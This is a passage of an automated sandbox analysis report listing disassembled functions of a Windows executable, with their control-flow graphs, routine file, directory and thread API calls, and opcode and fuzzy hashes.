                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: FileH_prolog3_HandleWrite
                                              • String ID:
                                              • API String ID: 2898186245-0
                                              • Opcode ID: 919640b9399492003c921a9168f28247f833fa3df52fa1e7ccfe1b4978832d66
                                              • Instruction ID: 06100e6a037c3076cfaca69dea36fa41a6caf7f87ef0d7b6f4c063ffdb2c2a4e
                                              • Opcode Fuzzy Hash: 919640b9399492003c921a9168f28247f833fa3df52fa1e7ccfe1b4978832d66
                                              • Instruction Fuzzy Hash: 7D419A35A01218AFDF14DFA4D888BEDBB76BFA4700F044158F801AB290CB759E44DBA1
                                              Function 00C9EFEF Relevance: 6.1, APIs: 4, Instructions: 96COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1256 c9efef-c9f00a call cb57d8 call ca13da 1261 c9f00c-c9f00f 1256->1261 1262 c9f031-c9f033 1256->1262 1261->1262 1264 c9f011-c9f017 1261->1264 1263 c9f035-c9f03d call c9ed0d 1262->1263 1273 c9f0e3-c9f0f0 GetLastError 1263->1273 1274 c9f043-c9f065 call ca169a 1263->1274 1265 c9f019 1264->1265 1266 c9f01b-c9f029 CreateDirectoryW 1264->1266 1265->1266 1268 c9f02f 1266->1268 1269 c9f0d0-c9f0d4 1266->1269 1268->1263 1271 c9f0df-c9f0e1 1269->1271 1272 c9f0d6-c9f0da call c9f58b 1269->1272 1277 c9f0fb-c9f100 call cb5787 1271->1277 1272->1271 1273->1277 1278 c9f0f2-c9f0fa 1273->1278 1281 c9f07d-c9f087 1274->1281 1282 c9f067-c9f06e 1274->1282 1278->1277 1286 c9f089-c9f09e 1281->1286 1287 c9f0bc-c9f0ce 1281->1287 1284 c9f070 1282->1284 1285 c9f073-c9f07b CreateDirectoryW 1282->1285 1284->1285 1285->1281 1288 c9f0a0-c9f0b0 call c919a9 1286->1288 1289 c9f0b3-c9f0bb call cb5726 1286->1289 1287->1269 1287->1273 1288->1289 1289->1287
                                              APIs
                                              • __EH_prolog3_GS.LIBCMT ref: 00C9EFF6
                                              • CreateDirectoryW.KERNELBASE(?,00000000,?,00000024,00C9EBA7,?,00000001,00000000,?,?,00000024,00C9A4DE,?,00000001,?,?), ref: 00C9F01F
                                              • CreateDirectoryW.KERNEL32(?,00000000,?,?,?,?,00000024,00C9EBA7,?,00000001,00000000,?,?,00000024,00C9A4DE,?), ref: 00C9F075
                                              • GetLastError.KERNEL32(?,?,00000024,00C9EBA7,?,00000001,00000000,?,?,00000024,00C9A4DE,?,00000001,?,?,00000000), ref: 00C9F0E3
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: CreateDirectory$ErrorH_prolog3_Last
                                              • String ID:
                                              • API String ID: 3709856315-0
                                              • Opcode ID: cdec87752c94873f332a70adbb7682c529a21fcea2a2d9ee25914f51335ad269
                                              • Instruction ID: 5f157c0b7fcd1ab14d1af65c50a3584caf5dc97a959ee8ea8838779b4e7736e8
                                              • Opcode Fuzzy Hash: cdec87752c94873f332a70adbb7682c529a21fcea2a2d9ee25914f51335ad269
                                              • Instruction Fuzzy Hash: 3B317E71910209DBDF10DFA9C98CAEEBBB8AF48304F14542EE511E3252CB749A86CB65
                                              Function 00C9E019 Relevance: 6.1, APIs: 4, Instructions: 56fileCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1294 c9e019-c9e025 1295 c9e032-c9e049 ReadFile 1294->1295 1296 c9e027-c9e02f GetStdHandle 1294->1296 1297 c9e04b-c9e054 call c9e152 1295->1297 1298 c9e0a5 1295->1298 1296->1295 1302 c9e06d-c9e071 1297->1302 1303 c9e056-c9e05e 1297->1303 1300 c9e0a8-c9e0ab 1298->1300 1304 c9e073-c9e07c GetLastError 1302->1304 1305 c9e082-c9e086 1302->1305 1303->1302 1306 c9e060 1303->1306 1304->1305 1307 c9e07e-c9e080 1304->1307 1308 c9e088-c9e090 1305->1308 1309 c9e0a0-c9e0a3 1305->1309 1310 c9e061-c9e06b call c9e019 1306->1310 1307->1300 1308->1309 1311 c9e092-c9e09b GetLastError 1308->1311 1309->1300 1310->1300 1311->1309 1313 c9e09d-c9e09e 1311->1313 1313->1310
                                              APIs
                                              • GetStdHandle.KERNEL32(000000F6,?,?,?,00000000,00C9E5D2,?,?,00000000,?,00000000), ref: 00C9E029
                                              • ReadFile.KERNELBASE(?,?,00000000,00100000,00000000,?,?,?,00000000,00C9E5D2,?,?,00000000,?,00000000), ref: 00C9E041
                                              • GetLastError.KERNEL32(?,?,?,00000000,00C9E5D2,?,?,00000000,?,00000000), ref: 00C9E073
                                              • GetLastError.KERNEL32(?,?,?,00000000,00C9E5D2,?,?,00000000,?,00000000), ref: 00C9E092
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: ErrorLast$FileHandleRead
                                              • String ID:
                                              • API String ID: 2244327787-0
                                              • Opcode ID: 1cbbc413817302e3a51beecd90f6f5d9cd26353684a05b70aaad37d5d92764a8
                                              • Instruction ID: 7d2ce537a79d0e80eed3042d0490449e76d8bc2104ca79e58ef9928685b887a5
                                              • Opcode Fuzzy Hash: 1cbbc413817302e3a51beecd90f6f5d9cd26353684a05b70aaad37d5d92764a8
                                              • Instruction Fuzzy Hash: 8E117C30500218EBDF20DB61C84CB6E37A9BB65361F50562AE42A85190DBB5DE44BB61
                                              Function 00CA7628 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49threadCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CreateThread.KERNELBASE(00000000,00010000,Function_00017760,?,00000000,?), ref: 00CA764C
                                              • SetThreadPriority.KERNEL32(?,00000000,?,?,?,?,00000004,00C9736D,00C95AB0,?), ref: 00CA7693
                                                • Part of subcall function 00C992EB: __EH_prolog3_GS.LIBCMT ref: 00C992F2
                                                • Part of subcall function 00C99500: __EH_prolog3_GS.LIBCMT ref: 00C99507
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: H_prolog3_Thread$CreatePriority
                                              • String ID: CreateThread failed
                                              • API String ID: 3138599208-3849766595
                                              • Opcode ID: c9ef1a002d3ceab31042de6413ceb23a8e4ca0c5ef060c81af4226466d8663b3
                                              • Instruction ID: 6f89bd4195549ebdd1f8e8b812bfd1233fbaf39d215cd5350d2aa47f0f66d15c
                                              • Opcode Fuzzy Hash: c9ef1a002d3ceab31042de6413ceb23a8e4ca0c5ef060c81af4226466d8663b3
                                              • Instruction Fuzzy Hash: B401D6B5348B066BE7107FA8DC85FA67358FB41715F20063EF6469A180CAF17801D738
                                              Function 00C9DE9A Relevance: 4.6, APIs: 3, Instructions: 115fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • __EH_prolog3_GS.LIBCMT ref: 00C9DEA1
                                              • CreateFileW.KERNELBASE(?,?,?,00000000,00000002,00000000,00000000,?,00000024,00C9E8F5,?,?,00C9A6B9,?,00000011,?), ref: 00C9DF15
                                              • CreateFileW.KERNEL32(?,?,?,00000000,00000002,00000000,00000000,?,?,?,00C9D303,?,?,?), ref: 00C9DF65
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: CreateFile$H_prolog3_
                                              • String ID:
                                              • API String ID: 1771569470-0
                                              • Opcode ID: 05bbc3f007bd5629a0f4a07d4641a7bf6650c3fdc4b7efa3918e86071a6b95d7
                                              • Instruction ID: a18b340fa9a69806f3bfe01ca4cfd8473f0459e118ef5b6bc3843465b6bdf2eb
                                              • Opcode Fuzzy Hash: 05bbc3f007bd5629a0f4a07d4641a7bf6650c3fdc4b7efa3918e86071a6b95d7
                                              • Instruction Fuzzy Hash: 8F417CB0910208DFDF14DFA8D88ABEEB7F4EB08324F14461EE466F7281D774A9448B24
                                              Function 00CA6C5E Relevance: 4.6, APIs: 3, Instructions: 90libraryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • __EH_prolog3_GS.LIBCMT ref: 00CA6C65
                                              • GetSystemDirectoryW.KERNEL32(00000000,00000104), ref: 00CA6C9A
                                              • LoadLibraryW.KERNELBASE(00000000,?,?,00000000,00000000,?), ref: 00CA6D0C
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: DirectoryH_prolog3_LibraryLoadSystem
                                              • String ID:
                                              • API String ID: 1552931673-0
                                              • Opcode ID: 0eb17cf0712b0c8ee8c156a499ea684c43e23a491e3ead32a538d0bf72ec4a00
                                              • Instruction ID: ccecce7f042418560c236764d546d4237d7c727fd169c8cc5f1364c043a80be9
                                              • Opcode Fuzzy Hash: 0eb17cf0712b0c8ee8c156a499ea684c43e23a491e3ead32a538d0bf72ec4a00
                                              • Instruction Fuzzy Hash: 27318D71E10209DFCF04EBE4C88ABEEBBB8AF49318F18011EE505B7281DB745A45DB61
                                              Function 00C9F58B Relevance: 4.6, APIs: 3, Instructions: 60COMMON
                                              Download Yara Rule
                                              APIs
                                              • __EH_prolog3_GS.LIBCMT ref: 00C9F592
                                              • SetFileAttributesW.KERNELBASE(?,?,00000024,00C9A724,?,?,?,00000011,?,?,00000000,?,?,?,?,?), ref: 00C9F5A8
                                              • SetFileAttributesW.KERNEL32(?,?,?,?,?,00C9D303,?,?,?,?,?,?,?,9CAA5719,00000049), ref: 00C9F5EB
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: AttributesFile$H_prolog3_
                                              • String ID:
                                              • API String ID: 2559025557-0
                                              • Opcode ID: 6dac49d8efae11be23859a1b182cb6006221306b1991c3bb967018c7c1264f06
                                              • Instruction ID: b4ed90abfc94c27d66be89fbfbe7cbf7b83e787525e6f0c21663f840be6f33f0
                                              • Opcode Fuzzy Hash: 6dac49d8efae11be23859a1b182cb6006221306b1991c3bb967018c7c1264f06
                                              • Instruction Fuzzy Hash: 8711E471910219EBDF04DFA8D889ADEB7B8BF08314F14402AF804E7250DB34DA56DB64
                                              Function 00C9EC63 Relevance: 4.6, APIs: 3, Instructions: 58fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • __EH_prolog3_GS.LIBCMT ref: 00C9EC6A
                                              • DeleteFileW.KERNELBASE(?,00000024,00C9D6F7,?), ref: 00C9EC7D
                                              • DeleteFileW.KERNEL32(00000000,?,00000000), ref: 00C9ECBD
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: DeleteFile$H_prolog3_
                                              • String ID:
                                              • API String ID: 3558260747-0
                                              • Opcode ID: 544cc3ed931c9a397be6cc428cefa9acb1a9a18da48000dafe831f6210eda481
                                              • Instruction ID: d9277400c921a9de611cfe467b4ce0f16ffed140aa490e12c579098dbeeacdb4
                                              • Opcode Fuzzy Hash: 544cc3ed931c9a397be6cc428cefa9acb1a9a18da48000dafe831f6210eda481
                                              • Instruction Fuzzy Hash: CF110471E10219DBDF04DFA8D889EDEB7B8AF08311F18042AE844F7250DB34AA85DB64
                                              Function 00C9ED1F Relevance: 4.6, APIs: 3, Instructions: 57COMMON
                                              Download Yara Rule
                                              APIs
                                              • __EH_prolog3_GS.LIBCMT ref: 00C9ED26
                                              • GetFileAttributesW.KERNELBASE(?,00000024,00C9ED16,00000000,00C9A4A1,9CAA5719,?,00C9CDDD,?,?,?,?,?,?,?,?), ref: 00C9ED39
                                              • GetFileAttributesW.KERNELBASE(?,?,?), ref: 00C9ED79
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: AttributesFile$H_prolog3_
                                              • String ID:
                                              • API String ID: 2559025557-0
                                              • Opcode ID: 1b3f78a5eaa59a8dd2e24e00f6b60b1a4188e2bf9e281394034ea90a18645ced
                                              • Instruction ID: 344967e3b278852c8acac3ce1d553bc2259081e56c0c27d1ef2c43fb429689d4
                                              • Opcode Fuzzy Hash: 1b3f78a5eaa59a8dd2e24e00f6b60b1a4188e2bf9e281394034ea90a18645ced
                                              • Instruction Fuzzy Hash: E5111975D10218DBCF04EFA8D989AEDB7F9FF49310F18042AE904F3280DB309A458B64
                                              Function 00C9E3D5 Relevance: 3.1, APIs: 2, Instructions: 140COMMON
                                              Download Yara Rule
                                              APIs
                                              • SetFilePointer.KERNELBASE(000000FF,?,?,?,?,00000000,?,00000000,00C9E3B1,?,?,00000000,?,?,00C9CC21,?), ref: 00C9E55F
                                              • GetLastError.KERNEL32 ref: 00C9E56E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: ErrorFileLastPointer
                                              • String ID:
                                              • API String ID: 2976181284-0
                                              • Opcode ID: 6b0d6237af2664b6612e873ac6d5d256d4e1aa90c887ef982e4928402e2a4545
                                              • Instruction ID: 0bc744f8bb021b9fb5f14ffa1218381483d1fcb59ffe4bcb2677972977d3f612
                                              • Opcode Fuzzy Hash: 6b0d6237af2664b6612e873ac6d5d256d4e1aa90c887ef982e4928402e2a4545
                                              • Instruction Fuzzy Hash: BA41F431604355CBCF24EFA5C98CBAEB3E5FB68720F14491DE89983641E770DD818BA1
                                              Function 00C9E772 Relevance: 3.1, APIs: 2, Instructions: 83timeCOMMON
                                              Download Yara Rule
                                              APIs
                                              • FlushFileBuffers.KERNEL32(?), ref: 00C9E78C
                                              • SetFileTime.KERNELBASE(?,?,?,?), ref: 00C9E840
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: File$BuffersFlushTime
                                              • String ID:
                                              • API String ID: 1392018926-0
                                              • Opcode ID: 236ecab8819ffe04a8897fd3edc01b01bd6fa73ed9325f0442fddf118eaac3f2
                                              • Instruction ID: 3b966cf691051ead76d07482103dddf7936b3cf729d4e24fc4c97268e48c29f5
                                              • Opcode Fuzzy Hash: 236ecab8819ffe04a8897fd3edc01b01bd6fa73ed9325f0442fddf118eaac3f2
                                              • Instruction Fuzzy Hash: 7921E431249246EBCB14DEB4C899AABBBE8AFA5304F04491DF4D5C3141D329DA0DD762
                                              Function 00CAFB4B Relevance: 3.1, APIs: 2, Instructions: 74COMMON
                                              Download Yara Rule
                                              APIs
                                              • __EH_prolog3_GS.LIBCMT ref: 00CAFB52
                                              • SHFileOperationW.SHELL32(?,?,?,?,?,?,?,00CE535C), ref: 00CAFC24
                                                • Part of subcall function 00C914A7: _wcslen.LIBCMT ref: 00C914B8
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: FileH_prolog3_Operation_wcslen
                                              • String ID:
                                              • API String ID: 3104323202-0
                                              • Opcode ID: 9f37c9cbf107ac79aeed10dcf2a109fc0e255a7d202b80e79fd773b1362a6f46
                                              • Instruction ID: cae4a0065869d8ebcbcf15efaea169ebc11a99e95ed48bda0048df7f797df156
                                              • Opcode Fuzzy Hash: 9f37c9cbf107ac79aeed10dcf2a109fc0e255a7d202b80e79fd773b1362a6f46
                                              • Instruction Fuzzy Hash: 80312771D0025D9EDF14DFE9C88ABDCBBB4BF09368F54012EE519A7191DB700A46DB20
                                              Function 00C9E850 Relevance: 3.1, APIs: 2, Instructions: 56COMMON
                                              Download Yara Rule
                                              APIs
                                              • SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000001), ref: 00C9E897
                                              • GetLastError.KERNEL32 ref: 00C9E8A4
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: ErrorFileLastPointer
                                              • String ID:
                                              • API String ID: 2976181284-0
                                              • Opcode ID: 5d2bb714308d0ca875316252b92396f74180a2e112419d8068d9eca9c7a34362
                                              • Instruction ID: 3985fec55af9fcbfce64cc2cf0111d60f597db174f55d6d7dd2ca67b2737bdcf
                                              • Opcode Fuzzy Hash: 5d2bb714308d0ca875316252b92396f74180a2e112419d8068d9eca9c7a34362
                                              • Instruction Fuzzy Hash: 97110830600600AFEF34D6ADCC48B6673E9EB55370F500729E162925D0D7B0FE45D768
                                              Function 00CB3C78 Relevance: 3.0, APIs: 2, Instructions: 46COMMON
                                              Download Yara Rule
                                              APIs
                                              • __EH_prolog3_catch_GS.LIBCMT ref: 00CB3C82
                                              • _wcslen.LIBCMT ref: 00CB3C99
                                                • Part of subcall function 00CA6A89: _wcslen.LIBCMT ref: 00CA6AA6
                                                • Part of subcall function 00C9B03D: __EH_prolog3_GS.LIBCMT ref: 00C9B044
                                                • Part of subcall function 00C9B3E1: __EH_prolog3_GS.LIBCMT ref: 00C9B3E8
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: H_prolog3__wcslen$H_prolog3_catch_
                                              • String ID:
                                              • API String ID: 1265872803-0
                                              • Opcode ID: 3cc8bbb9989367375e582bab2666e31b8910f2d5d21112abe16cb1bb321c4a54
                                              • Instruction ID: fe5742caaf62ac6b5db4b97ccbde630fbff095be5b55804a251a789e3d4136e7
                                              • Opcode Fuzzy Hash: 3cc8bbb9989367375e582bab2666e31b8910f2d5d21112abe16cb1bb321c4a54
                                              • Instruction Fuzzy Hash: CA11A9759416D0AECF14EB64AD95BDC7BB4AB15318F0441AEE4449F293CB700A44E7A1
                                              Function 00C91CE2 Relevance: 3.0, APIs: 2, Instructions: 45COMMON
                                              Download Yara Rule
                                              APIs
                                              • __EH_prolog3_GS.LIBCMT ref: 00C91CE9
                                              • GetDlgItem.USER32(?,?), ref: 00C91D01
                                                • Part of subcall function 00C914A7: _wcslen.LIBCMT ref: 00C914B8
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: H_prolog3_Item_wcslen
                                              • String ID:
                                              • API String ID: 896027972-0
                                              • Opcode ID: 659bf500a557c2e702605568b8ed35d2715717d9734300ee2a4a8d25d1910f44
                                              • Instruction ID: a8891b3ff300756101138540229fb690a60a912fde9b4d22e616be90644fc777
                                              • Opcode Fuzzy Hash: 659bf500a557c2e702605568b8ed35d2715717d9734300ee2a4a8d25d1910f44
                                              • Instruction Fuzzy Hash: BE0171726002159EDB25AF64C88BBEDB7E8AF54350F48010AFC16A71D1CB709A41D710
                                              Function 00CA76A7 Relevance: 3.0, APIs: 2, Instructions: 33COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetCurrentProcess.KERNEL32(02000000,?,00000002,00000002,?,00CA76EA,00CA0B6F), ref: 00CA76B4
                                              • GetProcessAffinityMask.KERNEL32(00000000,?,00CA76EA), ref: 00CA76BB
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
